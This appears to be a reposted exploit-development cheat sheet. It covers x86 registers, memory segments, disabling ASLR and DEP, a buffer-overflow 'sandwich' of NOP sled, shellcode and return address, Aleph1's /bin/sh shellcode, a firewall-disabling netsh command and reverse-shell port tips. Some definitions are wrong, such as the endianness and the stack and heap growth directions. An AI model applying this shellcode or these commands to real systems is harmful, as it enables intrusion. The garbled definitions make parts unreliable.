Exploit Knowledge Base
#From: http://hi.baidu.com/ring04h/blog/item/02c5bb254f59f17c34a80fa5.html
Target Architectures
intel
manuals
x86
assembly
sparc
assembly
sparc
manuals
pa/risc -
search for 'reference and manuals' on hp.com
Little/Big Endian
Byte ordering is different:
little endian
(intel, 32bit) = high-ordered first
big endian (sparc, 64bit, motorola) = low-ordered first
LIFO/FIFO
queueing process is different
LIFO = Last in First out
(Stack)
FIFO = First in First out (Heap)
Linux ELF
ELF = executable and linkable format
COFF = common
object file format
.so = dynamic library
.dtors = destructors
.ctors =
constructors
GOT = global offset table
PLT = procedure linkage
table
libraries (api) = /usr/lib
libc.so = C library
Windows PE
PE = portable executable
PE-COFF = portable executable common object file
format
PEB = process environment block
TEB = threat environment
block
PIC = position independant code
.dll = dynamic linked
library
Win32 API
DCOM = distributed common object model
MSVCRT.dll = C
Library
C Datatypes (x86)
integer (int) = 4 bytes
unsigned int = 4 bytes
short int = 2
bytes
long int = 4 bytes
long long int = 8 bytes
floating (float) = 4
bytes
character (char) = 1 bytes
Formatstrings
%d = decimal
%u = unsigned decimal
%x = hexadecimal
%s =
string
%n = number bytes written so far
Memory Segments
.text = text (code) portion of binary, read-only, segfaults if written
to
.data = initialised global and local variables, write-able,
fixed-size
.bss = uninitialised global and local variables, write-able,
fixed-size
heap = dynamically allocated variables (allocate+/free-)
(grows
down toward higher memory addresses)
stack = local variables, recursive
function calls (push+/pop-)
(grows up toward lower memory addresses)
Registers and Pointers
EAX,EBX,ECX,EDX = data manipulation
EAX = Accumulator
EBX = Base
ECX
= Counter
EDX = Data
AX,BX,CX,DX = 16bit data
manipulation
AH,BH,CH,DH,AL,BL,CL,DL = 8bit high/low
ordered
CS,SS,DS,ES,FS,GS = 16bit memory address pointers
Offset = offset
related to segment
EBP = extended base pointer (local environment for
function)
ESI = extended source index (data source offset)
EDI = extended
destination index (destination data offset)
ESP = extended stack pointer (top
of stack)
EIP = extended instruction pointer (address of next
instruction)
EEFLAGS = cpu logic and state tracking
Intel IA32 Registers
Runtime Memory
Runtime Memory / Registers
Stack
local variables, recursive function calls, example function: printf()
Heap
dynamically allocated variables, example function: malloc()
Exploits
0day = no patch available yet
poc = proof of concept
public = public
available exploit
private = privately exchanged exploit
local = local
privilege escalation
remote = remotely working exploit
Buffer Overflow Generations
1) stack-based overflows
2)
off-by-one and formatstring overflows
3) bss overflows
4) heap
overflows
System Preparation
for linux, disable protection when testing
exploits:
echo "0" > /proc/sys/kernel/randomize_va_space
echo "0" >
/proc/sys/kernel/exec-shield
echo "0" >
/proc/sys/kernel/exec-shield-random
allow core dumps in linux:
ulimit -c
unlimited
windows needs the following settings:
boot.ini for disabling
data execution prevention: /noexecute=AlwaysOff
registry for disabling ASLR
under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\MoveImages
Important Tools
gnu compiler collection:gcc
gnu
debugger:gdb
netwide assembler:nasm
windows
debugger:windbg
valgrind:valgrind
ollydbg:ollydbg(ollydbg.ini)
immunitydbg:immunitydbg
visual
c++ express:visual c++
express
ida pro free:ida pro
free
python:python
mosdef:mosdef
tcpdump:tcpdump
wireshark:wireshark
netcat:netcat
sysinternals:sysinternals
(regmon,filemon,handle,tcpview,process
explorer)
linux: ltrace, strace
solaris: truss
bsd: fstat
mac:
kdump, ktrace, vmmap
cisco: rommon
Exploiting
1) Control EIP ;)
2) Determine the offset(s)
3)
Determine the attack vector (opcode, env, dtors, libc)
4) Build the exploit
sandwich (nop sled, shellcode, esp)
5) Test the exploit :o
Exploit Sandwich
NOP sled
repeated no-operations (NOP's), no need to know exact offset, pointing somewhere into for sliding to the shellcode, use opcode0x90
Down to the Beef
overwrite EIP with A (0x41): python -c 'print("A"*200)'
overwrite EIP with
NOP sled: python -c 'print("\x90"*200)'
generate shellcode: python -c
'print("\xeb\x1f\x5e\x89...")' > sc
calculate return address (debugger,
pcalc)
overwrite EIP with repeated return address
address in right endian
format: python -c 'print("\x01\x23\x45\x67")'
buffer bytes - NOP sled -
Shellcode / 4 bytes = n times (x??)
build sandwich: sled + shellcode +
repeated return address
send string to application input or network socket
:)
python -c
'print("\x90"*20+"\xeb\x1f\x5e\x89..."+"\x01\x23\x45\x67"*10)'
if it
segfaults, debug it, adjust length, search for error(s)
poke around in memory
until you succeed!
Shellcoding
possible shellcodes: port binding, reverse connection, find and re-use
socket, code execution (execve), file transfer, multi staged, syscall proxying,
process injection, ...
avoid these whitespaces in shellcode:
0x00
terminates instructions, others may include 0x20, 0x0a, 0x0d, 0x1b, 0x0b and
0x0c
if target is suspected to have a firewall enabled, either disable it via
shell:
netsh firewall set opmode disable (admin/system privs needed)
or
use a reverse shell to a probably not filtered port like 443, 80, 53, ...
if
usable buffer is very small, use trampoline technique:
127 bytes in either
direction (EB06 = 6 bytes) or go after libc over env-variable
Bytecodes
jmp esp (0xff 0xe4)
call esp (0xff 0xd4)
push esp, ret (0x54
0xc3)
Shellcode
famous shellcode from
aleph1:
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) =
(int)shellcode;
}
disassembling shellcode:
compile it with gcc: gcc -o shellcode shellcode.c
debug with gdb: gdb
shellcode
gdb: x /24i &shellcode
gdb: x /s 0x???????
(das-sections)
gdb: quit
Exploit Development
1) Plan the exploit
determine offset and location of payload relative to
registers
find reliable jmp/call <register> offset for
product/windows
test shellcode with nop's
insert jmp's into paylaod to
avoid corruption
2) Write shellcode in inline assembly
allows for easier
editing and may save time
3) Maintain a shellcode library
saves a lot of
time, support for different platforms
4) Make it continue nicely
for
metasploit use thread (not seh) as exit code
if process is restarted when
terminated use exit(), ExitProcess() or TerminateProcess()
if thread is
restarted when terminated use ExitThread() or TerminateThread()
5) Make the
exploit stable
run more than once or multiple copies against same
target
support for multiple windows patchlevels, multi platform, linux
distros
log traces and firewalling issues
easy offset embedding
6) Make
it steal the connection
breakpoint socket calls like accept, recv, recvfrom,
send, sendto, use getpeername
read/write-file windows may use socket,
serializing socket
Python TCP Socket
import sys, os,
socket
host=sys.argv[1]
port=int(sys.argv[2])
s=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
s.connect((host,port))
data=s.recv(1024)
result=data.decode()
print
data
s.send(('\r\n\r\n\r\n\r\n'))
data2=s.recv(1024)
result2=data2.decode()
print
result2
s.close
More Links and Info
Metasploit Windows
System Calls
Metasploit Shellcode
Metasploit OpCode
Database
Metasploit
Unleashed
Editra Editor
Leo Editor
OpenRCE
Shellcoders
Handbook
